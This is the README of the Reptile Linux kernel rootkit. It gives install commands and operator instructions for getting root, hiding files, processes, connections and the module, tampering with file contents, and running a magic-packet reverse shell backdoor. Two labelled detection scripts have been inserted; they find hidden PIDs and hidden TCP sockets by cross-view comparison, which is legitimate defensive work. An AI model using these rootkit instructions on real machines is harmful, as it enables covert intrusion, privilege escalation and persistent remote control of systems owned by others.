Reptile: LKM Linux rootkit



Tested on

Debian 9: 4.9.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide itself (the kernel module)
  • Hide TCP/IP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle the Reptile shell
  • Shell connects back at a configurable interval (not the default)

Install

apt-get install linux-headers-$(uname -r)
perl -MCPAN -e "install String::Unescape"
git clone
cd Reptile
./setup install

Uninstall

./setup remove


Give root to unprivileged users

To get root privileges just type: /reptile/reptile_cmd root

Hide files, directories and kernel module

All files and folders that have "reptile" in their name are hidden. You can change this string in the installation script. The following commands hide/unhide files, folders, processes and the kernel module.

To hide: /reptile/reptile_cmd hide
To unhide: /reptile/reptile_cmd show

Hide processes

To hide a process: /reptile/reptile_cmd hide <pid>
To unhide a process: /reptile/reptile_cmd show <pid>
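Process hiding of the kind listed above is usually implemented by filtering what readdir() returns for /proc, so the standard defensive check is a cross-view comparison: list /proc, then probe every possible PID with kill(pid, 0) and see which IDs answer a signal but never appeared in the listing. The script below is an added example for defenders, not part of Reptile or its README; whether Reptile in particular also hooks the signal path (and so evades this check) is not stated on the page. It collects thread IDs from /proc/<pid>/task as well, because kill() also succeeds for a thread ID and a bare PID listing would otherwise flag every thread as hidden.

```python
import os


def visible_ids(proc_root="/proc"):
    """IDs the directory view exposes: every numeric entry under proc_root
    plus every thread ID under <pid>/task. Threads are included because
    kill(tid, 0) succeeds for them too, and they are never top-level entries."""
    ids = set()
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        ids.add(int(name))
        task_dir = os.path.join(proc_root, name, "task")
        try:
            ids.update(int(t) for t in os.listdir(task_dir) if t.isdigit())
        except OSError:
            pass  # process exited between the two listings; nothing to record
    return ids


def probed_ids(max_pid):
    """IDs that answer kill(pid, 0). Success or EPERM (task owned by another
    user) both mean the task exists; ESRCH means it does not."""
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        found.add(pid)
    return found


def hidden_ids(visible, probed, recheck=None):
    """IDs reachable by signal but absent from the directory view.
    `recheck` is a second directory listing taken after the probe loop,
    used to drop processes that were merely created in between."""
    candidates = probed - visible
    if recheck is not None:
        candidates -= recheck
    return sorted(candidates)


def read_pid_max(path="/proc/sys/kernel/pid_max", default=32768):
    """Upper bound for the probe loop; falls back to the classic default."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return default


if __name__ == "__main__":
    before = visible_ids()
    probed = probed_ids(read_pid_max())
    after = visible_ids()
    for pid in hidden_ids(before, probed, recheck=after):
        # A third view: a readdir() filter hides the entry from listings, but a
        # direct stat() of /proc/<pid> may still succeed. That combination is
        # much harder to explain away as a short-lived process.
        direct = "directly reachable" if os.path.exists(f"/proc/{pid}") else "not in /proc"
        print(f"pid {pid}: answers signals but missing from listing ({direct})")
```

Run it as root so that EPERM does not dominate the probe results (the check still works unprivileged, it just cannot distinguish other users' tasks from hidden ones by anything but the listing). The probe loop is deliberately stateless so that a few million kill() calls on a large pid_max stay cheap; the real signal of interest is the "directly reachable" case, which no benign race produces.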

Hide TCP/IP connections

Hide: /reptile/reptile_cmd conn <IP> <port> hide
Unhide: /reptile/reptile_cmd conn <IP> <port> show
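Connection hiding is normally done by filtering the rows the kernel emits for /proc/net/tcp, which is what netstat reads. A defender can compare that view with the one ss obtains over the inet_diag netlink socket and report sockets present in one but not the other. The script below is an added example for this purpose, not code from Reptile or its README; it parses both formats and runs the comparison on two constructed samples that are labelled as such. Whether Reptile also filters the netlink path is not stated on the page, and note that ss silently falls back to /proc/net/tcp when inet_diag is unavailable, in which case the two views are the same data and the check proves nothing.

```python
import subprocess

# /proc/net/tcp encodes each endpoint as little-endian hex IPv4 ':' hex port.
# The header line is skipped; fields[1] is the local and fields[2] the remote end.
def hex_endpoint(field):
    """'0100007F:0277' -> ('127.0.0.1', 631)."""
    ip_hex, port_hex = field.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets), int(port_hex, 16)


def parse_proc_net_tcp(text):
    sockets = set()
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        sockets.add((hex_endpoint(fields[1]), hex_endpoint(fields[2])))
    return sockets


# `ss -H -t -a -n -4` prints: State Recv-Q Send-Q Local:Port Peer:Port [...]
def ss_endpoint(field):
    host, port = field.rsplit(":", 1)
    host = "0.0.0.0" if host == "*" else host   # older ss prints '*' for any-address
    return host, 0 if port == "*" else int(port)


def parse_ss(text):
    sockets = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        sockets.add((ss_endpoint(fields[3]), ss_endpoint(fields[4])))
    return sockets


def missing_from_procfs(procfs_sockets, netlink_sockets):
    """Sockets the netlink view knows about but the procfs view does not."""
    return sorted(netlink_sockets - procfs_sockets)


# Constructed sample data (not captured from a real host): one LISTEN socket,
# one ESTABLISHED connection, and a second connection that only ss reports.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20001 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 0100007F:A1B2 01 00000000:00000000 00:00000000 00000000     0        0 20002 1 0000000000000000 100 0 0 10 0
"""
SAMPLE_SS = """\
LISTEN 0 128 127.0.0.1:631 0.0.0.0:*
ESTAB 0 0 127.0.0.1:22 127.0.0.1:41394
ESTAB 0 0 127.0.0.1:22 127.0.0.1:51000
"""


def live_check():
    """Run the comparison against the running system (IPv4 only)."""
    with open("/proc/net/tcp") as f:
        procfs = parse_proc_net_tcp(f.read())
    ss_out = subprocess.run(["ss", "-H", "-t", "-a", "-n", "-4"],
                            capture_output=True, text=True, check=True).stdout
    return missing_from_procfs(procfs, parse_ss(ss_out))


if __name__ == "__main__":
    for (lhost, lport), (rhost, rport) in missing_from_procfs(
            parse_proc_net_tcp(SAMPLE_PROC_NET_TCP), parse_ss(SAMPLE_SS)):
        print(f"sample: {lhost}:{lport} -> {rhost}:{rport} absent from /proc/net/tcp")
    for (lhost, lport), (rhost, rport) in live_check():
        print(f"live:   {lhost}:{lport} -> {rhost}:{rport} absent from /proc/net/tcp")
```

Only the (local, remote) pair is compared, not the state, because ss and procfs spell states differently and a socket changing state between the two reads would otherwise produce noise. Short-lived connections can still appear in one view and not the other; repeat the check and treat only persistent differences as findings.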

File content tampering

All content between the tags will be hidden:

content to hide

You can configure these tags in the installation script.

Backdoor

The backdoor is a reverse shell triggered by a magic packet sent over TCP, UDP or ICMP.


Client

./setup client

The client is MSF-like and very easy to use. Run ./client and type help to list the commands.


There are two other binaries: listener and packet. The client binary drives listener and packet for you, but you can also use them separately if you want.


Reverse shell

The shell is easy to use: just type help to see the commands.

  • It already hides its own process and connection.
  • Its connection is encrypted.
  • It has a built-in file uploader and downloader.
  • You can set a delay so that it reconnects back to you at the interval you want.
  • If you run shell you get a full TTY/PTY shell, like ssh.

Standalone reverse shell

You can compile this shell as a standalone version to use without the kernel module:

./setup reverse

Since no magic packets are sent in this mode, you need the listener binary to connect to the standalone reverse shell. Just compile it with ./setup client and use the listener binary.